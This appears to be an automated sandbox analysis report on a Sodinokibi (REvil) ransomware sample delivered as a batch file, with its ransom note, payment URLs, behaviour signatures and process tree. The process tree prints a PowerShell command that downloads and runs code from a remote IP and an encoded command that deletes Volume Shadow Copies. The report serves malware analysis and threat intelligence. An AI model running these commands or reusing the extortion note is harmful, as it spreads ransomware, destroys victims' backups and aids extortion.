Analysis

  • max time kernel
    146s
  • resource
    win7v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    T8hSRQ9v.bat

  • Sample

    191216-gpkwcwghx2

  • SHA256

    860e1d41ffe08b8824745666ed8f193468561b25df91e56472a336b6c6307e0d

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/T8hSRQ9v

Extracted

Language
ps1
Source

Extracted

Path

C:\7l955-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 7l955. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8950C755793BD156 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/8950C755793BD156 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: WS58N2UExb2MpRwEcOOQqsuhwEO4bz6AyLbFsxFizQp+LpoTE/DIqsqobwsFJLJK NNSUnqVnD3OLAGUWVC9OKA4NF6Nro2kGyZrvgOj2nu0IEAZMXkKZ0yhPvTdl+tJU o60oFyDJ68VN/o7xwE1GtcTsxQWs2F3/cAGSzIRnqfInN2kZNkbbn+m+mwKHoBCY caP1FD5hy7ElsTDrEHbmcKvpcGZf/zIjILgkm3iUNcScZ70qholJDa9RdyMubZ4y HHFAZxLtjOUGDI/Elr6FEXb2kNEr6bShGQSq9GeZ726g/y6XYt241G2CL7UoVGxW IZeS4LEIxfvqQnRGwSes+swjUvhepqUbNYCIDu/psJg9VwnVv0MklDeg1HwUlX7A n51DXTdB+clo4N6Tmib7sUkw3zlQqxovAqJ/zvfpOCrFRW6VWBZKQoGXdbTn6ipx xdt2VJR1dbjxyWW6ZSHUFvQAwgrLnlj5VBGLomMYqXhR0O/d+boJin2a3PNYmgFc J8nZGIMkvMCQ5RTWkwBIbbTx8gr3J3L5GZdu3OlnYDAvF79pc6QIPqNgCUr4p00O Sq+tZQbl9GH8MkP+GgJLA/vdHGW9ylEN1iaRvYvH1tvURl+GE6IzVZ8QJzCq+Jq4 cipMTmZsbc/CV5xHJubgH/PDX1ZwKeOwJoiPIYm+vOs74yImEyw6MuX/0vY+gTNG YsExS9OSWfiGRg5XGWCfGaHMQkLzHjUN8ezJvjuNK1JW/lmjRpM7FLJUCSEYGu9Y ISUYDEBtUqAecZClmprVlmI6zNieP2cOEipzoUkSVkbxKgq6CYdS0iO7sNMtUTeu Sben1t1Sx7KYRZljQG2BzFw5q6V3PY3q/Gv2mPzi8Ig8EBbu7akZooLjsS3bTgMa 31sPInrPcGHrP1gR6wnWOT+p02IXOF1QNEvNjhBovHILYx8vWuf0S9cpkXl8Y+Zs h4vcskKhfwaQ3S7gXbPYr64tYfTrs4VlfzVWnDm60eFHW+bdZvxdO/AjyLLHoc7h I7eG9sB3PXa75FpGHJGG/deCth6E6bcvreuPkSKOuscM0q5n3176O8yMCaYBYlzV cuqqbHmD1S3hPAfSoih56EECifGs6YoJdNJ73LjYain9s8TOaX6M6tYB15cf9jy9 nH9DLfPnl6OSrA== Extension name: 7l955 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8950C755793BD156

http://decryptor.top/8950C755793BD156

Signatures

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Drops file in Program Files directory 33 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Discovering connected drives 3 TTPs 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\T8hSRQ9v.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1080
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/T8hSRQ9v');Invoke-BVDZLQZL;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      • Discovering connected drives
      PID:1972
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1316
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1047222052-1129684272-1918778434-1978481421588430467-13735554-1610941389393606778"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1088
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1368621180-1236513769-16770415421934469526-1476111584-22092957010796012691539455200"
    1⤵
      PID:2020
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1412

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms